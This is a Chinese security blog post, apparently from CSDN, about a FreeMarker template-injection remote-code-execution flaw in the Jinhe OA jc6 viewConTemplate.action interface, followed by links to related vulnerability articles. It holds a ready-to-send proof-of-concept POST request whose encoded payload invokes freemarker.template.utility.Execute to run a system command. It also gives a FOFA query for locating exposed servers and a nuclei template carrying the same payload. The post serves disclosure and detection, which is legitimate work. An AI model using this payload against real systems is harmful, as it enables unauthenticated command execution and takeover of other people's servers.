金和OA_jc6_viewConTemplate.action存在FreeMarker模板注入漏洞

最新推荐文章于 2024-04-24 17:29:46 发布
最新推荐文章于 2024-04-24 17:29:46 发布
阅读量162 收藏
点赞数 2
文章标签: 安全 网络 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36334672/article/details/137110730
版权

1.漏洞介绍

​ 金和OA-jc6-viewConTemplate.action接口存在FreeMarker模板注入漏洞,未经身份验证的攻击者可以利用此漏洞远程代码执行、写入后门文件,导致服务器存在被控的风险。

2.漏洞编号
CVECNVDCNNVD
---

3.影响范围
名称版本号
-

4.检索特征

FOFA:body=“/jc6/platform/index/styles”

5.POC
POST /jc6/platform/portalwb/portalwb-con-template!viewConTemplate.action HTTP/1.1
Host: your-ip
Accept-Encoding: gzip
Content-Type: application/x-www-form-urlencoded
 
moduId=1&code=%253Cclob%253E%2524%257B%2522freemarker.template.utility.Execute%2522%253Fnew%28%29%28%2522ipconfig%2522%29%257D%253C%252Fclob%253E&uuid=1

nuclei检测

id: jinhe-OA-jc6-viewConTemplate-RCE
info:
  name: 金和OA jc6 viewConTemplate.action存在FreeMarker模板注入漏洞
  author: test
  severity: critical
  description: |
    金和OA-jc6-viewConTemplate.action接口存在FreeMarker模板注入漏洞,未经身份验证的攻击者可以利用此漏洞远程代码执行、写入后门文件,导致服务器存在被控的风险。
  impact: |
    未经身份验证的攻击者可以利用此漏洞远程代码执行
  remediation: |
    升级版本,打补丁
  metadata:
    verified: true
    max-request: 3
    fofa-query: body="/jc6/platform/index/styles"
  tags: OA,rce
requests:
  - raw:
      - |
        POST /jc6/platform/portalwb/portalwb-con-template!viewConTemplate.action HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip
        Content-Type: application/x-www-form-urlencoded
        moduId=1&code=%253Cclob%253E%2524%257B%2522freemarker.template.utility.Execute%2522%253Fnew%28%29%28%2522ipconfig%2522%29%257D%253C%252Fclob%253E&uuid=1
    matchers:
      - type: dsl
        dsl:
          - status_code == 200 && contains_all(body,"</clob>")

6.修复建议

更新到最新版本

7.参考信息
qq_36334672
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【1day】协同管理平台c6系统任意文件读取漏洞学习
记录并分享学习安全的知识点..
10-25 309
OA是一款企业级办公自动化软件,旨在提供高效的办公流程管理和协作解决方案。它提供了一系列功能和工具,帮助企业实现办公自动化、信息共享和团队协作。OA系统存在任意文件读取漏洞,攻击者通过恶意构造的请求下载服务器上的任意文件,包括敏感文件、配置文件、数据库文件等。这种漏洞通常存在Web应用程序中,是由于不正确的输入验证或不安全的文件处理机制导致。
FreeMarker_Manual_zh_CN.rar_freemarker spring
09-21
同时,由于FreeMarker与Spring MVC的集成,使得开发者可以充分利用Spring框架的强大功能,如依赖注入、AOP等,进一步提升开发效率和代码质量。 总的来说,FreeMarker 和 Spring MVC 的结合提供了一个高效、可扩展的...
Java FreeMarker模板引擎注入深入分析
蚁景网安学院
11-22 1232
最近和 F1or 大师傅一起挖洞的时候发现一处某 CMS SSTI 的 0day,之前自己在复现 jpress 的一些漏洞的时候也发现了 SSTI 这个洞杀伤力之大。今天来好好系统学习一手。
从ofcms的模板注入漏洞(CVE-2019-9614)浅析SSTI漏洞
Alexz__的博客
05-04 1693
什么是SSTI漏洞 CVE-2019-9614漏洞复现 ofcms的freemarker模板源码简要分析 壹 什么是SSTI漏洞 SSTI:Server Side Template Injection 服务器端模板注入漏洞 既然是注入漏洞,那么它所运用的核心思想就和XSSSQL注入差不多,都是运用不安全的用户输入,将正常的数据接收处进行恶意输入,导致服务器将用户输入数据当成代码并执行,从而完成一些危险的行为 我们针对SSTI来看,他的主要载体是web站点MVC架构之上,也就是从...
修复 Freemarker 模板注入漏洞
kylerduane的博客
08-24 1044
解决Freemarker 模板注入漏洞.,故可以使用我们自己定义的。
【复现】OA-jc6 RCE漏洞_74
最新发布
fushuang333的博客
04-24 490
【复现】OA-jc6 RCE漏洞,通过提交恶意构造的参数破坏命令语句结构,从而达到执行恶意命令的目的。继承Web服务器程序的权限,去执行系统命令,控制整个服务器。
OA jc6 viewConTemplate.action RCE漏洞复现
Keepb1ue的博客
03-14 715
OA协同办公管理系统j6软件是一种综合性的协同办公解决方案,旨在提高企业内部的协作效率和工作效率。它提供了一系列功能和工具,帮助组织进行任务管理、日程安排、文件共享、团队协作和沟通等方面的工作。
oa.rar_java oa_oa java_oa.rizhaosteel.com
09-20
这些模块的实现需要充分利用Struts的Action类来定义业务逻辑,使用Hibernate的Session接口来操作数据库,同时利用JSP或FreeMarker等技术来渲染用户界面。通过Struts的配置文件,可以定义各个模块间的跳转规则,实现...
FreeMarker_Manual_zh_CN.rar_freemarker
09-21
FreeMarker还支持继承和包含机制,允许一个模板继承另一个模板的结构,或在一个模板中嵌入另一个模板的内容。 在处理数据模型时,FreeMarker提供了自动类型转换和默认值设定。它能自动将Java对象转化为适合模板使用...
freemarker模板注入
weixin_44522540的博客
02-15 2168
一、freemarker和thymeleaf区别 freemarker这种编程式模板引擎,比如我们用一个判断会这么写 <#if ${isBig}>Wow!</#if> 而在thymeleaf中首先要考虑的问题是我的DOM是什么,而不是将 if 的逻辑放在哪里 在thymeleaf中判断会写出下面代码: <div th:switch="${user.role}"> <p th:case="'admin'">User is an administrator
漏洞复现-OA jc6/servlet/Upload接口任意文件上传漏洞(附漏洞检测脚本)
jjjj1029056414的博客
01-16 691
漏洞复现-OA jc6/servlet/Upload接口任意文件上传漏洞,附带自己写的poc脚本
漏洞复现】OA C6 UserList 存在SQL注入漏洞
https://blog.echo234.cn/
03-29 292
OA协同办公管理系统C6软件共有20多个应用模块,160多个应用子模块,涉及的企业管理业务包括协同办公管理、人力资源管理、项目管理、客户关系管理、企业目标管理、费用管理等多个业务范围,从功能型的协同办公平台上升到管理协同管理平台,并不断的更新完善,全面支撑企业发展。OA C6 UserList存在SQL注入漏洞
漏洞复现】​OA-viewConTemplate.action-远程命令执行漏洞
Nday_Seeker
03-21 393
OA viewConTemplate.action存在远程命令执行漏洞。攻击者可能通过精心构造的输入数据,在未经适当授权的情况下执行任意恶意代码指令。
OA Servlet接口任意文件上传漏洞
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
12-06 750
和数字化智能办公平台(简称JC6)是一款结合了人工智能技术的数字化办公平台,为企业带来了智能化的办公体验和全面的数字化转型支持。同时符合国家信创认证标准,支持组织数字化转型,实现业务流程的数字化、智能化和协同化,提高企业竞争力。
JeecgBoot3.5漏洞升级—快速文档
JEECG官方博客
11-24 1064
近几年来,黑客攻击行为呈现出日益复杂和隐蔽的趋势,对个人和组织的安全造成了严重威胁。黑客们不断寻找新的漏洞安全漏洞,利用各种手段进行网络攻击,包括恶意软件、网络钓鱼、勒索软件等。因此,我们每个人都需要关注漏洞风险,加强网络安全意识,及时更新系统补丁。目前有网友反馈受到攻击勒索,虽然我们的商业客户并没受到影响,但也请尽快升级补丁,避免未知的风险
OA jc6/servlet/Upload接口任意文件上传
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
01-16 704
和数字化智能办公平台(简称JC6)是一款结合了人工智能技术的数字化办公平台,为企业带来了智能化的办公体验和全面的数字化转型支持。同时符合国家信创认证标准,支持组织数字化转型,实现业务流程的数字化、智能化和协同化,提高企业竞争力。JC6基于J2EE和SOA体系架构,支持微服务架构。它提供标准化的数据规范和API接口,支持多种部署方式,如集团化应用、多维度的权限管理、大规模用户以及集群式部署等。此外,它可以适应不同企业的需求和技术环境,帮助企业实现数字化转型并提升竞争力。
记一次项目上的漏洞挖掘
Workers77的博客
02-14 3858
接到领导通知,要对某个客户的资产做一次渗透,客户只给了一个C段IP,具体的资产需要自己去收集 通过fofa搜索后,拿到一堆的资产。看了一遍发现客户有个和的OA系统,于是就有了下面的故事 打开后就是个登录界面,因为在前期信息收集的时候也看到这个OA存在一个用户名的注入漏洞(历史漏洞 协同管理平台SQL注入漏洞(无需登录demo站成功复现) | wooyun-2015-0141624| WooYun.org),这个洞虽然比较老了,但也可以试一下。按照这个保姆级教程抓包测试 结果可想而知 ..
CVE-2020-16898: Windows TCP/IP远程执行代码漏洞通告
爱国小白帽
10-14 6681
原创 360CERT [三六零CERT](javascript:void(0)???? 今天 报告编号:B6-2020-101402 报告来源:360CERT 报告作者:360CERT 更新日期:2020-10-14 0x01 漏洞简述 2020年10月14日,360CERT监测发现 Microsoft 发布了 TCP/IP远程代码执行漏洞 的风险通告,该漏洞编号为CVE-2020-16875,漏洞等级:严重,漏洞评分:9.8。 远程攻击者通过构造特制的ICMPv6 Router Advertisemen
Freemarker模板注入:CVE-2020-7477
守拙的博客
08-04 2276
一、漏洞名称: FusionAuth存在Freemarker模板注入导致远程命令执行 二、漏洞编号: CVE-2020-7477 三、漏洞描述: 在FusionAuth 1.11.0之前版本存在注入漏洞,经过身份验证的用户被允许编辑电子邮件模板或主题, 远程攻击者可利用该漏洞调用在系统上执行任意命令。 四、影响版本: FusionAuth <= 1.11.0 五、漏洞分析 通过对直接编辑freemarker模板,调用freemarker.template.utility.E
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值